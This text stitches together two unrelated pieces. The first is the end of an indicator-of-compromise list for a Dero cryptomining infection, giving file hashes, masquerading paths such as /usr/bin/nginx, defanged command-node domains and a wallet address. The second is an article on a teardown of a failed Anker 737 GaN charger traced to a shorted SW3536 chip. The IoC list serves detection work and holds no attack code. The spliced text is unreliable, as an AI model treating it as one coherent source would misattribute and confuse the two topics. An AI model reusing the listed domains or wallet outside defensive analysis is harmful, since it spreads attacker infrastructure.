094085675570A18A9225399438471CC9 nginx
14E7FB298049A57222254EF0F47464A7 cloud

File paths
NOTE: Certain file path IoCs may lead to false positives due to the masquerading technique used.
/usr/bin/nginx
/usr/bin/cloud
/var/log/nginx.log
/usr/bin/version.dat

Derod nodes addresses
d.windowsupdatesupport[.]link
h.wiNdowsupdatesupport[.]link

Dero wallet address
dero1qyy8xjrdjcn2dvr6pwe40jrl3evv9vam6tpx537vux60xxkx6hs7zqgde993y

securelist.com/dero-miner-infe…

Taking a break from his usual prodding at suspicious AliExpress USB chargers, [DiodeGoneWild] recently had a gander at what used to be a good USB charger.
The Anker 737 USB charger prior to its autopsy.
Before it went completely dead, the Anker 737 GaNPrime USB charger which a viewer sent him was capable of up to 120 Watts combined across its two USB-C and one USB-A outputs. Naturally the charger’s enclosure couldn’t be opened non-destructively, and it turned out to have (soft) potting compound filling up the voids, making it a treat to diagnose. Suffice it to say that these devices are not designed to be repaired.

With it being an autopsy, the unit got broken down into the individual PCBs, with a short detected that eventually got traced down to an IC marked ‘SW3536’, which is one of the ICs that communicates with the connected USB device to negotiate the voltage. With the one IC having shorted, it appears that it rendered the entire charger into an expensive paperweight.

Since the charger was already in pieces, the rest of the circuit and its ICs were also analyzed. Here the gallium nitride (GaN) part was found in the Navitas GaNFast NV6136A FET with integrated gate driver, along with an Infineon CoolGaN IGI60F1414A1L integrated power stage. Unfortunately all of the cool technology was rendered useless by one component developing a short, even if it made for a fascinating look inside one of these very chonky USB chargers.

youtube.com/embed/-JV5VGO55-I?…

hackaday.com/2025/05/21/fault-…